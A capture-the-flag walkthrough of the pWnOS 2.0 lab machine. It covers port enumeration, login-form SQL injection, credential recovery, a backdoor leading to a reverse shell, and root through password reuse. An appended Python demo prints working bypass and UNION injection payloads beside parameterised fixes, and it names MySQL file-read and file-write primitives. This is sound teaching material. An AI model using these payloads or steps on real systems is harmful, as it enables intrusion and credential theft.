I enjoyed pWnOS 1.0 so much that I decided to attempt 2.0 right after it.
Step 1 – Find the pWnOS IP address
The machine is assigned the static IP 10.10.10.100 rather than picking one up over DHCP, so I manually assigned my Kali box an address in the same network segment before going any further.
Step 2 – Enumerate the host for open ports, service versions and OS
This provides the following attack surface:
- Port 22 – OpenSSH 5.8p1 Debian 1ubuntu3
- Port 80 – Apache httpd 2.2.17
- OS – Linux web 2.6.38-8-server #42-Ubuntu x86_64
Step 3 – Enumerating the web application
The login form appears to be vulnerable to SQL injection. I modified the login request in Burp Suite to confirm it.
Logged in as a user through the injection.
Contents of the /etc/passwd file, retrieved through the same injection point.
Obtaining the database credentials.
Writing a backdoor file that allows command execution, and using it to obtain a reverse shell.
Found another file containing a different set of MySQL credentials.
That password is reused for the root account, so the box is rooted. With SSH already open on port 22, every credential recovered from configuration files is worth trying against the system accounts, not just the database.
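To make the injection step concrete, here is an added example (it is not code from the original walkthrough or from the pWnOS 2.0 application) that reproduces the two things the injection buys in Step 3: an authentication bypass and a UNION-based extraction of other rows, each beside the parameterised version that closes the hole. It uses an in-memory SQLite table with assumed names (`users`, `email`, `pass`) and constructed rows in place of the target's MySQL database.

```python
import sqlite3

# Constructed stand-in for the target's user table. The table and column
# names (users, email, pass) and the rows are assumptions for this example,
# not the real pWnOS 2.0 schema.
def setup_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, email TEXT, pass TEXT)")
    conn.executemany(
        "INSERT INTO users (email, pass) VALUES (?, ?)",
        [("admin@example.com", "S3cr3t"), ("user@example.com", "hunter2")],
    )
    conn.commit()
    return conn


def login_vulnerable(conn, email, password):
    """Login check built by string concatenation: attacker input becomes SQL."""
    query = f"SELECT id FROM users WHERE email = '{email}' AND pass = '{password}'"
    return conn.execute(query).fetchone() is not None


def login_safe(conn, email, password):
    """Same check with bound parameters: input can never change the query shape."""
    query = "SELECT id FROM users WHERE email = ? AND pass = ?"
    return conn.execute(query, (email, password)).fetchone() is not None


def lookup_vulnerable(conn, user_id):
    """An injectable lookup whose result is echoed back to the user.
    A UNION payload turns it into a generic channel for reading other rows."""
    query = f"SELECT email FROM users WHERE id = '{user_id}'"
    return [row[0] for row in conn.execute(query).fetchall()]


def lookup_safe(conn, user_id):
    """Parameterised lookup: the payload is compared as data and matches nothing."""
    query = "SELECT email FROM users WHERE id = ?"
    return [row[0] for row in conn.execute(query, (user_id,)).fetchall()]


# Payloads. The trailing "-- " comments out the rest of the original query,
# so the AND pass = '...' clause never runs.
BYPASS_EMAIL = "' OR '1'='1' -- "
UNION_ID = "0' UNION SELECT pass FROM users -- "

if __name__ == "__main__":
    db = setup_db()
    print(login_vulnerable(db, BYPASS_EMAIL, "x"))   # True: logged in without a password
    print(login_safe(db, BYPASS_EMAIL, "x"))         # False
    print(lookup_vulnerable(db, UNION_ID))           # both stored passwords
    print(lookup_safe(db, UNION_ID))                 # []
```

Against MySQL, the same injection point, given the FILE privilege, extends to `LOAD_FILE()` for reading files such as /etc/passwd and `SELECT ... INTO OUTFILE` for dropping a file into the web root; SQLite has no equivalent, so those primitives are not reproduced here.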